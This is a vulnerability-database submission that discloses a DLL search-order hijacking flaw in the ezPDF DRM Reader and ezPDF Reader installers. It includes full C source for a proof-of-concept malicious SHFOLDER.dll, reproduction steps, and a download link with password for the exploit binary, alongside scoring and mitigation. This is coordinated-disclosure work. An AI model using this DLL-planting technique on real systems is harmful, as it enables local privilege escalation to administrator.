Submit #736172: Unidocs Inc. ezPDF DRM Reader / ezPDF Reader v3.0.0.4 / v2.0 Uncontrolled Search Pathinfo

TitleUnidocs Inc. ezPDF DRM Reader / ezPDF Reader v3.0.0.4 / v2.0 Uncontrolled Search Path
DescriptionEMBARGO/CVE RESERVATION REQUEST: Despite the efforts I've made to notify the vendor of such vulnerabilities, no response has been received to date. I am requesting a CVE identifier reservation with a strict embargo. Please do not publish this entry or its technical details until April 11, 2026, or until the vendor officially releases a public patch, whichever occurs first. The ezPDF_DRM_Reader_3.0.0.4.exe and ezPDFReader_setup.exe installers (both 32-bit) are vulnerable to DLL Search Order Hijacking due to insecure search path. When executed, the installer attempts to load several system DLLs, including SHFOLDER.dll, without specifying a fully qualified path. Hence the application initially looks for the DLL in the Current Working Directory (CWD). A local, low-privileged attacker can place a malicous DLL with a matching name in the same directory as the installer (e.g., the user's Downloads folder). When the installer is run with an administrator privileges, the malicious DLL is executed with High Integrity, allowing the arbitrary code execution with administrative privileges. Analysis(PoC): To adhere to Coordinated Disclosure best practices and maintain the embargo, the complete Proof-of-Concept (including source code and exploit binary, screenshots, and videos) is hosted at the password-protected link below. I am also available to provide the source code directly via encrypted email if preferred. You can download the PoC on the link below (password: ezpdfvulnerability) => https://gofile.me/7bU54/ZG47Lh7Yx For environments where external file downloads are restricted, the following source code is provided for independent compilation and verification of the vulnerability. ############################################################################################################################### /* * PoC: Local Privilege Escalation via DLL Search Order Hijacking * Purpose: Demonstrates successful code execution in a privileged context. * Verification: Spawns PowerShell to display User Identity and Token Privileges. */ #include <windows.h> DWORD WINAPI Payload(LPVOID lpParam) { // Include 'hostname' and 'whoami' for a complete identity profile. WinExec("powershell.exe -NoExit -Command \"hostname; whoami; whoami /priv\"", SW_SHOW); return 0; } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // CreateThread is used to ensure the host process doesn't hang while the PoC runs CreateThread(NULL, 0, Payload, NULL, 0, NULL); break; } return TRUE; } ############################################################################################################################### The vulnerability was validated on a clean installation of Windows 11 (latest build) hosted via Oracle VirtualBox v7.2.4. Verification was conducted using Process Monitor (ProcMon) to identify insecure library loading attempts. To simulate a real-world attack vector, the Proof of Concept (PoC) utilized two distinct security contexts: a low-privileged user account to plant the malicious payload and a high-privileged administrative account to execute the installer, confirming successful elevation of privilege. Vulnerable File: ezPDF_DRM_Reader_3.0.0.4.exe / ezPDFReader_setup.exe Target DLL: SHFOLDER.dll Steps to Reproduce: 1. Create a malicious DLL named SHFOLDER.dll (SHFOLDER.cpp provided, 32-bit). 2. Place the malicious DLL in the same directory as ezPDF_DRM_Reader_3.0.0.4.exe or ezPDFReader_setup.exe. 3. Execute the installer 4. Observe the execution of malicious code within a high-integrity process context. Scoring: CVSS v3.1: 7.3 (High) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CVSS v4.0: 7.3 (High) Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N Mitigation: The developer should call SetDefaultDllDirectories to restrict DLL loading to the system directory or use absolute paths when calling LoadLibrary.
Source⚠️ https://gofile.me/7bU54/ZG47Lh7Yx
User
 RoyalSnek (UID 94373)
Submission01/11/2026 04:25 (3 months ago)
Moderation02/14/2026 20:42 (1 month later)
StatusAccepted
VulDB entry346107 [Unidocs ezPDF DRM Reader/ezPDF Reader 2.0/3.0.0.4 SHFOLDER.dll uncontrolled search path]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!